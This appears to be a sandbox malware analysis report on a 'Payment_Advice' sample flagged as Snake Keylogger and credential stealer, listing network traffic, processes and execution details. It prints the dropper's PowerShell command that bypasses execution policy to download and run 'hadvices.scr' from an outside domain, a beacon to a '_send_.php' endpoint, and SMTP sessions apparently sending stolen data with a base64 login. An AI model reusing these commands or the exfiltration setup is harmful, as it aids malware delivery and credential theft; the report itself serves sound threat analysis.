2024-05-01 13:17:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49738	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:32 UTC	61	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-01 13:17:33 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Wed, 01 May 2024 13:17:33 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLe9tx%2FTWp2%2BGuiK6hFwOoZKBQrq%2BV5fkpPUIUjFPZml%2BmawW%2FVMgjyJQmjaFI5A5kM%2BJx7yY94nuatA2tEbFuF0pbJta2Iv%2Byej3HdgdMoJP2IUWXMutKdWiorVQmwIbpOlix8j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d670c242429-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:33 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49740	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:33 UTC	85	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-01 13:17:34 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 7 Last-Modified: Wed, 01 May 2024 13:17:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrG693truyS3mZIl83V3OBwSMgWD9JvfIwhTqT%2BuJI1H9HeUJV4SdDyv22DCvEXuPQdhEZ35N1h4B1rNhXux8S546bU2v5TPr8KJv304SECzdyRn%2BQOEyPnzGB%2FvisEgy8%2BY09zd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d6ffc8d6905-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:34 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49742	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:34 UTC	61	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-01 13:17:34 UTC	702	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Wed, 01 May 2024 13:17:30 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqAS%2B2D7Ru6GhBfKHk5jOYfrQ9TxDKlJ8852PhdzHaKKlMu8mfI0%2BXVz5GRmbL2zoYiEul5NCycDnw6cWdpye6IUirDl0H4Ibd5oVWSwB4EpEcQkZXGG6JIdtsAQ8xh6Ygv6H%2Flv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d74bcae7ff1-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:34 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49744	104.21.67.152	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:35 UTC	85	OUT	GET /xml/149.18.24.96 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-01 13:17:35 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 7 Last-Modified: Wed, 01 May 2024 13:17:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ml%2B%2BvwWUJr76KwmuM0WNwpxJjkMmg4BMQna2oqYOukDuPpUhpG2qn8AnxdchKcsFACNM%2BT4%2Bkfe7dBYOFx%2BfPDrbwgQAwvZlQFVoDbncSipGUD9nez5xc%2Fm2fGnnSI%2FKPgprRro0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00d797bcc05ca-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:35 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>149.18.24.96</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-01 13:17:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49745	172.67.169.18	443	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:38 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-05-01 13:18:17 UTC	735	IN	HTTP/1.1 522 Date: Wed, 01 May 2024 13:18:17 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHNrrYvy%2BkPoAIF5a6nDxjr1uQrTaF5bemuCncmd9FSZitvkQnlar2ddvFU%2BrCMJgc3dXeqPfoBCCrSJYtXWETxS2ZP9ujwRAxyhHMezrPYRXjGfV%2BjTkhtiX0fJUNDsrx2l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 87d00d8b5c5d38fe-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:18:17 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 1, 2024 15:18:23.203701973 CEST	587	49750	108.167.142.65	192.168.2.6	220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:23 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
May 1, 2024 15:18:23.203963995 CEST	49750	587	192.168.2.6	108.167.142.65	EHLO 216041
May 1, 2024 15:18:23.389377117 CEST	587	49750	108.167.142.65	192.168.2.6	250-gator4175.hostgator.com Hello 216041 [149.18.24.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
May 1, 2024 15:18:23.395678043 CEST	49750	587	192.168.2.6	108.167.142.65	AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
May 1, 2024 15:18:23.581990004 CEST	587	49750	108.167.142.65	192.168.2.6	334 UGFzc3dvcmQ6
May 1, 2024 15:18:23.842849016 CEST	587	49750	108.167.142.65	192.168.2.6	235 Authentication succeeded
May 1, 2024 15:18:24.309128046 CEST	49750	587	192.168.2.6	108.167.142.65	MAIL FROM:<test@qoldenfrontier.com>
May 1, 2024 15:18:24.493947983 CEST	587	49750	108.167.142.65	192.168.2.6	250 OK
May 1, 2024 15:18:24.496265888 CEST	49750	587	192.168.2.6	108.167.142.65	RCPT TO:<receive@qoldenfrontier.com>
May 1, 2024 15:18:24.694298029 CEST	587	49750	108.167.142.65	192.168.2.6	250 Accepted
May 1, 2024 15:18:24.730072975 CEST	49750	587	192.168.2.6	108.167.142.65	DATA
May 1, 2024 15:18:24.914940119 CEST	587	49750	108.167.142.65	192.168.2.6	354 Enter message, ending with "." on a line by itself
May 1, 2024 15:18:24.979598045 CEST	49750	587	192.168.2.6	108.167.142.65	.
May 1, 2024 15:18:25.165400028 CEST	587	49750	108.167.142.65	192.168.2.6	250 OK id=1s29qq-002Ma0-2e
May 1, 2024 15:18:35.618192911 CEST	49750	587	192.168.2.6	108.167.142.65	QUIT
May 1, 2024 15:18:36.004209042 CEST	587	49750	108.167.142.65	192.168.2.6	221 gator4175.hostgator.com closing connection
May 1, 2024 15:18:36.425878048 CEST	587	49751	108.167.142.65	192.168.2.6	220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:36 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
May 1, 2024 15:18:36.426166058 CEST	49751	587	192.168.2.6	108.167.142.65	EHLO 216041
May 1, 2024 15:18:36.611047029 CEST	587	49751	108.167.142.65	192.168.2.6	250-gator4175.hostgator.com Hello 216041 [149.18.24.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
May 1, 2024 15:18:36.611226082 CEST	49751	587	192.168.2.6	108.167.142.65	AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
May 1, 2024 15:18:36.796236038 CEST	587	49751	108.167.142.65	192.168.2.6	334 UGFzc3dvcmQ6
May 1, 2024 15:18:36.982484102 CEST	587	49751	108.167.142.65	192.168.2.6	235 Authentication succeeded
May 1, 2024 15:18:36.982645035 CEST	49751	587	192.168.2.6	108.167.142.65	MAIL FROM:<test@qoldenfrontier.com>
May 1, 2024 15:18:37.167573929 CEST	587	49751	108.167.142.65	192.168.2.6	250 OK
May 1, 2024 15:18:37.167742968 CEST	49751	587	192.168.2.6	108.167.142.65	RCPT TO:<receive@qoldenfrontier.com>
May 1, 2024 15:18:37.365413904 CEST	587	49751	108.167.142.65	192.168.2.6	250 Accepted
May 1, 2024 15:18:37.365582943 CEST	49751	587	192.168.2.6	108.167.142.65	DATA
May 1, 2024 15:18:37.550287008 CEST	587	49751	108.167.142.65	192.168.2.6	354 Enter message, ending with "." on a line by itself
May 1, 2024 15:18:37.550667048 CEST	49751	587	192.168.2.6	108.167.142.65	.
May 1, 2024 15:18:37.736639023 CEST	587	49751	108.167.142.65	192.168.2.6	250 OK id=1s29r3-002Mmc-1T
May 1, 2024 15:18:37.737063885 CEST	49751	587	192.168.2.6	108.167.142.65	QUIT
May 1, 2024 15:18:38.122791052 CEST	587	49751	108.167.142.65	192.168.2.6	221 gator4175.hostgator.com closing connection
May 1, 2024 15:18:38.547389030 CEST	587	49752	108.167.142.65	192.168.2.6	220-gator4175.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 01 May 2024 08:18:38 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
May 1, 2024 15:18:38.561496019 CEST	49752	587	192.168.2.6	108.167.142.65	EHLO 216041
May 1, 2024 15:18:38.747147083 CEST	587	49752	108.167.142.65	192.168.2.6	250-gator4175.hostgator.com Hello 216041 [149.18.24.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
May 1, 2024 15:18:38.796757936 CEST	49752	587	192.168.2.6	108.167.142.65	AUTH login dGVzdEBxb2xkZW5mcm9udGllci5jb20=
May 1, 2024 15:18:38.982598066 CEST	587	49752	108.167.142.65	192.168.2.6	334 UGFzc3dvcmQ6
May 1, 2024 15:18:39.170084000 CEST	587	49752	108.167.142.65	192.168.2.6	235 Authentication succeeded
May 1, 2024 15:18:39.212426901 CEST	49752	587	192.168.2.6	108.167.142.65	MAIL FROM:<test@qoldenfrontier.com>
May 1, 2024 15:18:39.398041964 CEST	587	49752	108.167.142.65	192.168.2.6	250 OK
May 1, 2024 15:18:39.452255011 CEST	49752	587	192.168.2.6	108.167.142.65	RCPT TO:<receive@qoldenfrontier.com>
May 1, 2024 15:18:39.652631998 CEST	587	49752	108.167.142.65	192.168.2.6	250 Accepted
May 1, 2024 15:18:39.789217949 CEST	49752	587	192.168.2.6	108.167.142.65	DATA
May 1, 2024 15:18:39.974926949 CEST	587	49752	108.167.142.65	192.168.2.6	354 Enter message, ending with "." on a line by itself
May 1, 2024 15:18:39.976706982 CEST	49752	587	192.168.2.6	108.167.142.65	.
May 1, 2024 15:18:40.164144039 CEST	587	49752	108.167.142.65	192.168.2.6	250 OK id=1s29r5-002Mnt-2q
May 1, 2024 15:18:40.164619923 CEST	49752	587	192.168.2.6	108.167.142.65	QUIT
May 1, 2024 15:18:40.552539110 CEST	587	49752	108.167.142.65	192.168.2.6	221 gator4175.hostgator.com closing connection

Target ID:	0
Start time:	15:17:01
Start date:	01/05/2024
Path:	C:\Users\user\Desktop\Payment_Advice.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment_Advice.scr.exe"
Imagebase:	0x7b0000
File size:	957'440 bytes
MD5 hash:	49C97A3774C358B5FCBFF920382A44F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.2102466582.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:17:01
Start date:	01/05/2024
Path:	C:\Users\user\Desktop\Payment_Advice.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment_Advice.scr.exe"
Imagebase:	0xf50000
File size:	957'440 bytes
MD5 hash:	49C97A3774C358B5FCBFF920382A44F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:17:01
Start date:	01/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo
Imagebase:	0x7ff6d6ad0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:17:01
Start date:	01/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:17:02
Start date:	01/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:17:08
Start date:	01/05/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
Imagebase:	0x7ff651090000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:17:08
Start date:	01/05/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	15:17:09
Start date:	01/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:17:09
Start date:	01/05/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff70df30000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	15:17:21
Start date:	01/05/2024
Path:	C:\Windows\Temp\hadvices.scr
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\hadvices.scr" /S
Imagebase:	0x5d0000
File size:	1'041'408 bytes
MD5 hash:	012DE24142F859797FBB5A25A7A3290D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs Detection: 35%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:17:24
Start date:	01/05/2024
Path:	C:\Windows\Temp\hadvices.scr
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\hadvices.scr"
Imagebase:	0x580000
File size:	1'041'408 bytes
MD5 hash:	012DE24142F859797FBB5A25A7A3290D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Executed Functions

Function 0297B558 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0297B729

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 17902daef22f4080e5b3e86b379e7a791a6cec22894078ee28908a6c8277e1e3
Instruction ID: d5ba2252cd58fceb39994af841a2a67383a5c30a60488cc67008acedc0b7806d
Opcode Fuzzy Hash: 17902daef22f4080e5b3e86b379e7a791a6cec22894078ee28908a6c8277e1e3
Instruction Fuzzy Hash: 5B81CF74C0026DDFDB21CFA9C980BEDBBF5AB49304F1091AAE509B7260DB709A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0297A600 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0297A6D3

Memory Dump Source

Source File: 00000000.00000002.2101507109.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2970000_Payment_Advice.jbxd

Similarity

